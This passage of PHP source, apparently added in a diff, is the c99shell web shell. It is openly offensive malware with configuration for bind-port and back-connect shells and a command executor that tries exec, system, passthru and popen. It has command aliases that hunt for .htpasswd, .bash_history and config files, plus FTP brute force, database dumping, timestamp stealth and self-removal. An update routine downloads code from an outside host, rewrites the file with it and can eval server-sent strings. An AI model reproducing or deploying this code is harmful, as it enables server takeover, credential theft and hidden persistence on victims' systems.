PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied"; + +$gzipencode = true; //Encode with gzip? + +$updatenow = false; //If true, update now (this variable will be false) + +$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server +$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server + +$filestealth = true; //if true, don't change modify- and access-time + +$donated_html = "<center><b>Owned by hacker</b></center>"; + /* If you publish free shell and you wish + add link to your site or any other information, + put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = true; //If true then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: + 0 - files and folders (as default), + 1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "<b>" (default) + string {closetag} - close html-tag, e.g. "</b>" (default) + bool {break} - if true and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8; // lines in hex preview file +$hexdump_rows = 24; // 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = true; //Buffer-function +$copy_unset = false; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",$surl), + array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.back(1)"), + array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">","#\" onclick=\"history.go(1)"), + array("<img src=\"".$surl."act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"), + array("<img src=\"".$surl."act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",""), + array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=search&d=%d"), + array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",$surl."act=fsbuff&d=%d"), + array("<b>Encoder</b>",$surl."act=encoder&d=%d"), + array("<b>Tools</b>",$surl."act=tools&d=%d"), + array("<b>Proc.</b>",$surl."act=processes&d=%d"), + array("<b>FTP brute</b>",$surl."act=ftpquickbrute&d=%d"), + array("<b>Sec.</b>",$surl."act=security&d=%d"), + array("<b>SQL</b>",$surl."act=sql&d=%d"), + array("<b>PHP-code</b>",$surl."act=eval&d=%d"), + array("<b>Update</b>",$surl."act=update&d=%d"), + array("<b>Feedback</b>",$surl."act=feedback&d=%d"), + array("<b>Self remove</b>",$surl."act=selfremove"), + array("<b>Logout</b>","#\" onclick=\"if (confirm('Are you sure?')) window.close()") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/ Next code isn't for editing \/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("<a href=\"http://ccteam.ru/releases/cc99shell\">c99shell</a>: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |<br>"," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return false;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== false) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return true; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return false;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== false) + { + if (($o != ".") and ($o != "..")) + { + $ret = true; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return true; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return false;} + } + else {return false;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== false) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return false;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== false) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return false;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return false;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return false;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";} + elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";} + else {return "<font color=green>".view_perms(fileperms($o))."</font>";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ + global $c99sh_sourcesurl; + $array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return false;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = true) +{ + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return false;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = true;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = true;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>"; + if ($tbl_struct) + { + echo "<td valign=\"top\"><b>Fields:</b><br>"; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";} + echo "</td></tr></table>"; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return false;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== false) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", false); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "<font color=red>ON (secure)</font>"; +} +else {$safemode = false; $hsafemode = "<font color=green>OFF (not secure)</font>";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=red>".$v."</font>";} +else {$openbasedir = false; $hopenbasedir = "<font color=green>OFF (not secure)</font>";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title><?php echo getenv("HTTP_HOST"); ?> - c99shell</title><STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; 